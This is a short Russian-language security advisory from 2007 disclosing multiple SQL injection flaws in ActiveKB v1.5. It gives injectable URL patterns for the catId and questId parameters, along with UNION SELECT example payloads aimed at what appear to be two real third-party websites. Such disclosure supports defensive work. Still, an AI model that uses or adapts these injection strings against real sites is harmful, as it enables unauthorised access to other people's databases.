SQL-инъекция в ActiveKB v1.5

2007-08-28T00:00:00
ID SECURITYVULNS:DOC:17901
Type securityvulns
Reporter Securityvulns
Modified 2007-08-28T00:00:00

Description

Здравствуйте, 3APA3A.

Software: ActiveKB v1.5 Vendor: www.interspire.com Vulnerability: множественные SQL-инъекции Risk: средний Date: 27.08.2007 discovered by durito [damagelab] -durito[at]mail[dot]ru- HTTP: durito.narod.ru

+~~~:| Details |:

SQL-инъекции

+~~~:| Экплойт |:

http://www.target.com/activekb/index.php?ToDo=browse&catId=[SQL] http://www.target.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]

+~~~:| Пример |:

http://www.accessecu.com/kb/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/ http://summitsupport.net/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/

-- С уважением, durito [NGH Group] mailto:durito@mail.ru http://durito.narod.ru http://ngh.void.ru